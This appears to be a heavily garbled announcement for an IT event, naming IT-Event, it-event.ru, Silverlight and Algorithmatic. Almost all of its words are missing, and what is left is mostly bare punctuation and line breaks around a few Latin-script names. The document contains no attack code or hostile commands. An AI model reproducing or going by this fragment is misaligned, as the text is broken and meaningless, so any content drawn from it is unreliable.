, ,
,
IT. IT-Event (, ),
IT- , . , ,
, , !

, ,
, ,
. , ,
Silverlight, . Algorithmatic
, .

it-event.ru


Algorithmatic
